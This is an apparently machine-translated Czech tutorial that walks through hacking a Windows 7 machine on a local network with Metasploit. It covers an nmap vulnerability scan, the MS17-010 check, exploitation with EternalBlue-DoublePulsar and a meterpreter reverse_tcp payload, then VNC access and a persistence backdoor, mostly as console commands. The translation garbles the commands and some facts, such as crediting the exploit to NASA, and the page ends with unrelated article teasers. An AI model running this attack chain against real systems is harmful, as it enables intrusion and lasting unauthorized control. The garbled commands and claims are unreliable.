metasploit

Výukový program Metasploit

Výukový program Metasploit

Jelikož jsme diskutovali o NEJLEPŠÍCH 25 NEJLEPŠÍCH NÁSTROJÍCH KALI LINUX a METASPLOIT jsme umístili na první místo v seznamu, pojďme nyní diskutovat a dozvědět se o METASPLOIT. Doporučujeme vám seznámit se s Metasploit.

Metasploit původně vytvořil H. D Moore v roce 2003, dokud nebyl získán a dále rozvíjen společností Rapid7 21. října 2009. Metasploit-framework je kompletně napsán pomocí Ruby a je standardním balíčkem nainstalovaným v systému Kali Linux (a myslím, že téměř ve všech operačních systémech Penetration Testing). Jedná se o oblíbenou soupravu hackerů nebo penetračních testerů pro výzkum zranitelností zabezpečení, vývoj a provádění exploit na cílech a další vývoj zabezpečení.

Metasploit přichází s několika edicemi, které jsou obecně rozděleny do dvou kategorií, bezplatná verze a placená verze. Bezplatné verze: Metasploit Framework Community Edition (rozhraní založené na CLI) a Armitage (rozhraní založené na GUI). Placené verze: Metasploit Express, Metasploit Pro a Cobalt Strike (to je obdoba Armitage, kterou poskytuje Strategic Cyber ​​LLC).

Metasploit umožňuje uživatelům vytvářet (nebo vyvíjet) vlastní zneužitelný kód, ale nebojte se, pokud nevíte, jak kódovat, Metasploit má tolik modulů a jsou průběžně aktualizovány. V současné době má Metasploit přes 1 600 exploitů a 500 užitečných zatížení. Jednoduchý způsob, jak pochopit, co jsou zneužití a užitečné zatížení, je zneužití v podstatě tím, jak útočník doručuje užitečné zatížení prostřednictvím díry zranitelnosti cílového systému.  Jakmile útočník spustí zneužití, které obsahuje užitečné zatížení proti zranitelnému cíli, pak je nasazeno užitečné zatížení (užitečné zatížení použité k připojení zpět k útočníkovi za účelem získání vzdáleného přístupu proti cílovému systému), v této fázi je zneužití hotové a stává se irelevantní.

"Metasploit není hackerský okamžitý nástroj, je to šílený rámec"

Tento článek Metasploit je o provádění penetračních testů proti cílovému systému pomocí následujícího toku:


PŘÍPRAVA

Ujistěte se, že náš Kali Linux má nejnovější aktualizovanou verzi. V každé aktualizaci budou vylepšení. Spusťte následující příkazy:

~ # apt aktualizace
~ # apt upgrade -y
~ # apt dist-upgrade -y

Jakmile je náš stroj aktuální, nyní můžeme začít spuštěním konzoly metasploit. Do terminálu zadejte:

~ # msfconsole

A také potřebujete jakýkoli textový editor, Gedit nebo Leafpad, abyste během cesty shromáždili nějaké informace, než sestavíme útok. Nejprve identifikujte svou IP adresu bezdrátového rozhraní, IP routeru a masky sítě.

Na základě výše uvedených informací si všimneme adresy WLAN1 a IP routeru a masky sítě. Poznámka by tedy měla vypadat takto:

Útočník IP (LHOST): 192.168.1.56
IP brána / router: 192.168.1.1
Maska sítě: 255.255.255.0 (/ 24)


KROK 1: SKENOVÁNÍ ZRANITELNOSTI

V konzole metasploit poté nejprve shromáždíme informace, jako je cílová adresa IP, operační systém, otevřené porty a chyba zabezpečení. Metasploit nám umožňuje spouštět NMap přímo z konzoly. Na základě výše uvedených informací spusťte tento příkaz a proveďte náš úkol shromažďování informací.

msf> nmap -v 192.168.1.1/24 --script vuln -Pn -O

Z výše uvedeného příkazu jsme dostali výsledek níže.

Máme zranitelný cíl s operačním systémem Windows a zranitelný je ve službě SMBv1. Přidejte tedy na vědomí.

Cílová IP (RHOST): 192.168.1.57
Chyba zabezpečení: Chyba zabezpečení umožňující vzdálené spuštění kódu na serverech Microsoft SMBv1 (ms17-010)


KROK 2: POSOUZENÍ ZRANITELNOSTI

Nyní známe cíl a jeho zranitelnost. Pojďme zkontrolovat zranitelnost v metasploit konzole

Nyní známe cíl a jeho zranitelnost. Pojďme zkontrolovat zranitelnost v konzole metasploit pomocí pomocného modulu smb_scanner. Spusťte následující příkaz:

msf> použijte pomocný / skener / smb / smb_ms17_010
msf auxiliary (smb_ms17_010)> nastavit RHOSTS [cílová IP]
msf pomocný (smb_ms17_010)> spustit

Metasploit je přesvědčen o zranitelnosti a ukazuje přesnou edici Windows OS. Přidat do poznámky:

Cílový operační systém: Windows 7 Ultimate 7600


KROK 3: VYUŽÍVÁNÍ

Metasploit bohužel nemá žádný modul zneužití související s touto chybou zabezpečení. Ale nebojte se, venku je vystaven člověk, který napsal zneužitelný kód. Exploit je známý, protože je iniciován NASA a nazývá se EternalBlue-DoublePulsar. Můžete jej chytit odtud, nebo můžete postupovat podle průvodce z výukového videa níže a nainstalovat exploitový kód do svého metasploit framework.

Jakmile budete postupovat podle výše uvedeného průvodce, (ujistěte se, že cesta je stejná jako v tutoriálu). Nyní jste připraveni cíl zneužít. Spusťte následující příkazy:

použijte exploit / windows / smb / eternalblue_doublepulsar
nastavit užitečné zatížení windows / meterpreter / reverse_tcp
nastavit PROCESSINJECT spoolsv.exe
nastavit RHOST 192.168.1.57
nastavit LHOST 192.168.1.56

Využívat

Boom ... Exploit uspěl, máme relaci měřiče. Jak jsem již zmínil dříve, jakmile bude exploit spuštěn, nasadí užitečné zatížení, což je, zde jsme použili, Windows /metrpreter/ reverse_tcp.


KROK 4: ZÍSKÁNÍ VZDÁLENÉHO PŘÍSTUPU

Pojďme prozkoumat více dostupných příkazů, zadejte '?'(bez otazníku) a podívejte se na seznam dostupných příkazů. The Stdapi, systémové příkazy jsou:

Chcete-li zobrazit více informací o cílovém systému, použijte 'sysinfo'příkaz. Výstup by měl vypadat takto.

Vzhledem k tomu, že jsme do systému vstřikovali dříve (spoolsv.exe), máme System Privilege. Vlastníme cíl. S příkazem k cíli toho můžeme udělat hodně. Například bychom mohli spustit RDP, nebo jen nastavit VNC remote. Chcete-li spustit službu VNC, zadejte příkaz:

~ # spustit vnc

Výsledkem by měla být pracovní plocha cílového počítače, vypadá to takto.

Nejdůležitější částí je vytvořit zadní vrátka, takže kdykoli se cíl odpojí od našeho stroje, pokusí se cílový počítač připojit zpět, znovu k nám. Backdooring se používá k udržení přístupu, je to jako rybaření, nebudete házet ryby zpět do vody, jakmile je máte, správně? Chcete s rybami něco udělat, ať už je chcete uložit do ledničky pro další akce, jako je vaření, nebo prodat za peníze.

Meterpreter má tuto trvale funkci backdooring. Spusťte následující příkaz a podívejte se na dostupné parametry a argumenty.

metrpreter> spustit vytrvalost -h

Pokud vám tento zastaralý skript nevyhovuje, je nejnovější modul persistence pod post / windows / spravovat / persistence_exe. Můžete to dále prozkoumat sami.

Metasploit je obrovský, není to jen nástroj, je to rámec, vezměte v úvahu, že má více než 1600 exploitů a asi 500 užitečných zatížení. Jeden článek je vhodný pro celkový obraz obecného použití nebo nápadu. Ale z tohoto článku jste se toho tolik naučili.

"Čím více sledujete tok útoku, tím více máte bez námahy výzvu.".“

Trackpad a ukazatel myši AppyMouse na obrazovce pro tablety Windows
Uživatelé tabletů často postrádají ukazatel myši, zejména když obvykle používají notebooky. Dotykové smartphony a tablety mají mnoho výhod a jediným o...
Střední tlačítko myši nefunguje ve Windows 10
The prostřední tlačítko myši pomáhá procházet dlouhé webové stránky a obrazovky se spoustou dat. Pokud se to zastaví, budete nakonec používat klávesni...
Jak změnit levé a pravé tlačítko myši na počítači se systémem Windows 10
Je úplnou normou, že všechna zařízení počítačových myší jsou ergonomicky navržena pro praváky. K dispozici jsou však myší zařízení, která jsou speciál...